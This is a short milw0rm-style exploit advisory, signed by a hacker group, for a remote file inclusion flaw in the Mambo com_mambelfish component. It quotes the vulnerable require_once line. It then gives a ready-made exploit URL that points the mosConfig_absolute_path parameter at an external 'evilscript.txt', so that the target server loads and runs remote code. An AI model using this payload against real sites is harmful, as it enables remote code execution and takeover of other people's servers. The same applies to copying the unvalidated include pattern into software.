39 lines
No EOL
1.3 KiB
Text
39 lines
No EOL
1.3 KiB
Text
####################################################
|
|
# #
|
|
# C Y BE R - W A R R i O R T I M #
|
|
# #
|
|
####################################################
|
|
|
|
mambo com_mambelfish Component (mosConfig_absolute_path) Remote File
|
|
Inclusion Vulnerabilities
|
|
|
|
####################################################
|
|
|
|
Author: mdx
|
|
|
|
####################################################
|
|
|
|
Class : Remote
|
|
|
|
####################################################
|
|
|
|
cont@ct: bilkopat[at]hotmail[dot]com
|
|
|
|
####################################################
|
|
|
|
Code: mambelfish.class.php?, line 28
|
|
***************************************************************************************************
|
|
|
|
require_once( "$mosConfig_absolute_path/administrator/classes/minixml/minixml.inc.php" );
|
|
|
|
***************************************************************************************************
|
|
|
|
|
|
Exploit:
|
|
http://www.site.com/[path]/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://site.com/evilscript.txt?
|
|
|
|
####################################################
|
|
Greetz: Cyber-warrior TIM USERS
|
|
####################################################
|
|
|
|
# milw0rm.com [2006-08-17] |